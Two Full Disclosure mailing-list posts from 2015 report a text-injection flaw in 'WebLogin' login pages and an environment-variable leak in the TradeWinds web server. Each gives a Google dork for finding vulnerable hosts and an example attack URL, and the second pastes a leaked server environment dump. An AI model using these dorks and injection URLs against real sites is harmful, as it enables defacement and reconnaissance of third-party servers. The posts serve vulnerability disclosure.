[FD] weblogin software cross site request

2015-07-17 Thread Juan Martinez
Hi, People i discover a cross site request in this
Dork: intitle:weblogin intext:This page will redirect you to:

This cross site request is exploit like this example:
http://target/Login:%20Weblogin%20%20This%20page%20will%20redirect%20you%20to%20
inject any word you want to screen in the webpage. Or another Poc is for
example:
http:target?referer=inject the word or number you want to like view in the
page.
I advice fix this bug because is very easy deface this webpages whith
Product:WebLogin
Best Regard.
Rootktit Pentester.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Bug in TradeWinds

2015-02-18 Thread Juan Martinez
Hi, I turn to you because I want to make public a bug, a web server called
Trade Winds, by which much compromising information of internal servers
exposed ... Through a Dork on google: inurl: cgi-shl / twserver.exe run?.
They are vulnerable server, injecting this url: http:
//victim/cgi-shl/twserver.exe run (example: CityInfo?). Which brings us
back an error with this data: TradeWinds: Environment variables sent by
Microsoft-IIS / 6.0 ALLUSERSPROFILE = C: \ Documents and Settings \ All
Users APP_POOL_ID = DefaultAppPool ClusterLog = C: \ WINDOWS \ Cluster \
cluster.log CommonProgramFiles = C: \ Program Files \ Common Files
COMPUTERNAME = WEBSERVER ComSpec = C: \ WINDOWS \ system32 \ cmd.exe
DSETPATH = C: \ Program Files \ Dell \ DSET FP_NO_HOST_CHECK = NO lib = C:
\ Program Files \ SQLXML 4.0 \ bin \ NUMBER_OF_PROCESSORS = 2 OS =
Windows_NT Path = C: \ PHP \; C: \ Perl \ site \ bin; C: \ Perl \ bin; C: \
Program Files \ Support Tools \; C: \ PVSW \ BIN; C: \ CFusionMX7 \ verity
\ k2 \ _nti40 \ bin; C: \ WINDOWS \ system32; C: \ WINDOWS; C: \ WINDOWS \
System32 \ Wbem; C: \ Program Files \ Dell \ SysMgt \ RAC5; C: \ Program
Files \ Dell \ SysMgt \ oma \ bin; C: \ Program Files \ Microsoft SQL
Server \ 80 \ Tools \ Binn \; C: \ Program Files \ Microsoft SQL Server \
90 \ Tools \ Binn \; C: \ Program Files \ Microsoft SQL Server \ 90 \ DTS \
Binn \; C: \ Program Files \ Microsoft SQL Server \ 90 \ Tools \ Binn \
VSShell \ Common7 \ IDE \; C: \ Program Files \ Microsoft Visual Studio 8 \
Common7 \ IDE \ PrivateAssemblies \; D: \ MySQL \ MySQL 1.3.6 Utilities \
PATHEXT = .COM; .EXE; .BAT; .CMD; .VBS; .VBE; .JS; .JSE; .wsf; .WSH PHPRC =
C: \ PHP \ PROCESSOR_ARCHITECTURE = x86 PROCESSOR_IDENTIFIER = x86 Family 6
Model 62 Stepping 4 GenuineIntel PROCESSOR_LEVEL = 6 PROCESSOR_REVISION =
3e04 ProgramFiles = C: \ Program Files SystemDrive = C: SystemRoot = C: \
WINDOWS TEMP = C: \ WINDOWS \ TEMP TMP = C: \ WINDOWS \ TEMP USERPROFILE =
C: \ Documents and Settings \ Default User VERITY_CFG = C: \ CFusionMX7 \
verity \ k2 \ common \ verity.cfg VSL = C: \ PVSW \ BIN windir = C: \
WINDOWS That data and more the server, and the pc making the connection. So
I decided to report to you and make public the ruling. Greetings and hope
not having bothered with their time.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/